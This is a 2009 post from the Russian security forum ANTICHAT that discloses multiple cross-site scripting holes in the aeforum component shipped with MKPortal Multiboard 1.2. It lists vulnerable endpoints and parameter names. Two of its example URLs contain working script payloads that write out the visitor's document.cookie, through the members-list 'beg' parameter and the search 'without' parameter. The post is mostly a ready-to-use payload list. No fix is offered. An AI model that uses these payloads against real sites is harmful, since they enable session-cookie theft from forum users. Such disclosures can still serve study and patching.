Уязвимости движка MKPortal Multiboard 1.1

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.

Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.

⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

Форум aeforum, поставляемый с версией 1.2

01.04.2009, 06:58

Twoster

Reservists Of Antichat - Level 6

Регистрация: 20.08.2008

Сообщений: 328

Провел на форуме:
7144817

Репутация: 1503

Форум aeforum, поставляемый с версией 1.2

Множественные XSS

1.

Цитата:

http://site.ru/aeforum/index.php?act=usercp&ucpact=searchpm
Уязвимы все поля:
from
to
subject
hasthewords
doesnthave

Цитата:

http://site.ru/aeforum/index.php?act=usercp&ucpact=profileУязвимы все поля:
dobyear
dobmonth
dobday
title
location
privatetext
icq
yim
msn
aim
gmail
www

Цитата:

http://site.ru/aeforum/index.php?act=usercp&ucpact=writepmpmrecipients
pmsubject
pmbody

Цитата:

http://site.ru/aeforum/index.php?act=members&sortby=1&order=1&beg="><scri pt>document.write(document.cookie)</script>

Цитата:

http://site.ru/aeforum/index.php?act=usercp&ucpact=account
Поля
realname
secretqt

Цитата:

http://site.ru/aeforum/index.php?act=search&sact=results&allwords=&exactp hrase=&atleastone=&without=</script><script>document.write(document.cookie)</script>&within=1&starter=&forums%5B%5D=0&showas=1& search=Search

__________________

You may say I'm a dreamer
But I'm not the only one